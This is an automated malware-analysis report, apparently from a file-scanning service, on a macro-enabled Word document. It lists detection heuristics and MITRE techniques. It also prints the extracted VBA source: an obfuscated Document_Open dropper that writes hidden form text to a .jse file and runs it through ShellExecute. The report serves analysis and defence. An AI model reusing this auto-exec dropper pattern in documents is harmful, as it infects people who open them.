MALICIOUS
218
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is a macro-enabled Word document containing obfuscated VBA code. The `Document_Open` macro is present and triggers the execution of this code, which utilizes `CreateObject` and appears to be designed to download and execute a second-stage payload. The presence of `CreateObject` and the obfuscated nature of the auto-exec loader strongly suggest malicious intent.
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17)) Dim NN65bU As String -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17)) Dim NN65bU As String -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() Load Collect -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim folderP As String folderP = Environ(Collect.Where) folderP = folderP & "\" & Rnd -
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 5584 bytes |
SHA-256: eb4ff09653e995856f14d8177ff8bb144870b89501e1e4fe41f869414d163c31 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub SearchForBorders1()
Dim k As Word.Paragraph
Dim bFound As Boolean
For Each k In ActiveDocument.Paragraphs
bFound = False
If k.Borders(wdBorderTop).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderLeft).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderBottom).LineStyle <> wdLineStyleNone _
Then bFound = True
If k.Borders(wdBorderRight).LineStyle <> wdLineStyleNone _
Then bFound = True
Dim lXR3G75N As Long
lXR3G75N = 4997713
Dim N7M66689Ca As Long
N7M66689Ca = 41726
Dim ojL5B As Long
If bFound Then
k.Range.Select
Exit Sub
End If
Next k
End Sub
Private Sub Document_Open()
Load Collect
Dim someStr As String
someStr = Collect.HowName.Text
Dim rs58jMs95K3 As String
rs58jMs95K3 = "very each winter climate completely pleasure till want flower gravity waste catch heart usual stepped figure event wherever safety them act worse here also tone ourselves song giant solve active beauty missing him wrote finally knowledge feathers actually dropped liquid magic fifty unknown clean principal second those stepped arrangement poetry grew become gate down coal person result mysterious string consider scale becoming likely except blind sum pass rain ocean wear thy member milk border personal flight hide individual planet expression provide lake hollow happen position being captured learn chemical thought exchange recognize plane shore duty running ask pay term piece climb order trail step orbit present action dear zulu sick corner except immediately quick regular"
Set tryToRun = CreateObject(Mid(Collect.WhatDo.Caption, 14, 17))
Dim NN65bU As String
NN65bU = "unhappy length adventure jar war grain loud idea properly suddenly military snake naturally deeply transportation supply mix idea second explanation student ago married further through difficulty possibly kept meal aid safe feet pictured kept tax lonely terrible sleep iron scene hurry bag imagine early myself concerned empty worker wish one ought valley vapor hair cream shore copper mix value breathe better refused tiny happened complex very grandfather composition plant sport mile divide leader want clear enter muscle secret visit vote mud struggle western shinning cent chain due pan story who uncle forest front limited class bean fifty subject scene pipe beneath closer level eight quick flight upon than never according rising"
tryToRun.ShellExecute (someStr)
Set tryToRun = Nothing
End Sub
Sub SearchForBorders2()
Static a As Long, l As Long
Dim b As Boolean
Dim bd As Border
Dim bds As Borders
Dim prg As Paragraph
Dim prgs As Paragraphs
Dim re As Range
Dim se As Selection
Dim doc As Word.Document
ojL5B = 71135
Dim Pl2RJWEbY63l As Long
Pl2RJWEbY63l = 454
Dim tAi9bmTOgWNo As Long
tAi9bmTOgWNo = 2967
Set se = Selection
Set re = se.Range
Set doc = ActiveDocument
If se.Start < l Then a = se.Start
With doc.Content
Set bds = .Borders
re.Start = a
re.End = .End
End With
For Each bd In bds
b = bd = True
If b Then Exit For
Next
If Not b Then Exit Sub
Set prgs = re.Paragraphs
For Each prg In prgs
Set re = prg.Range
If InStr(re.Text, Chr(13)) = 0 Then
re.End = re.End + 1
End If
Set bds = re.Borders
For Each bd In bds
b = bd = True
If b Then Exit For
Next
If b Then
a = re.Start
se.Start = re.Start
se.End = re.Start
a = re.End
l = se.Start
Exit Sub
End If
Next
a = 0
MsgBox "No more borders found"
End Sub
Sub TransposeParagraphs()
Selection.MoveUp Unit:=wdParagraph, _
Count:=1, Extend:=wdExtend
Selection.MoveLeft Unit:=wdCharacter, Count:=1
Selection.MoveDown Unit:=wdParagraph, _
Count:=1, Extend:=wdExtend
Selection.Range.Cut
Selection.MoveDown Unit:=wdParagraph, Count:=1
Selection.Range.Paste
End Sub
Attribute VB_Name = "NewMacros"
Sub d()
End Sub
Attribute VB_Name = "Collect"
Attribute VB_Base = "0{09A65737-1974-4A42-9D02-BEE352E0B45B}{1195DADB-125B-4FEF-9AA6-683FB293A7E2}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Private Sub UserForm_Initialize()
Randomize
Dim strData As String
strData = Data.DataText.Caption
Dim folderP As String
folderP = Environ(Collect.Where)
folderP = folderP & "\" & Rnd
folderP = folderP & ".jse"
Collect.HowName.Text = folderP
Open folderP For Output As #5
Print #5, strData
Close #5
End Sub
Attribute VB_Name = "Data"
Attribute VB_Base = "0{7DA87B00-2474-4B41-822B-B4FEED49323A}{5438B97E-06D6-4A75-8A07-F7811BE6010C}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 60928 bytes |
SHA-256: c1cea542cbac4ac4e62afe9755b84b1cbe06dd9a8ed8fb90592d45e6cad95043 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 4 eval/decoder/string-building token(s). Carved artifact contains 5 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.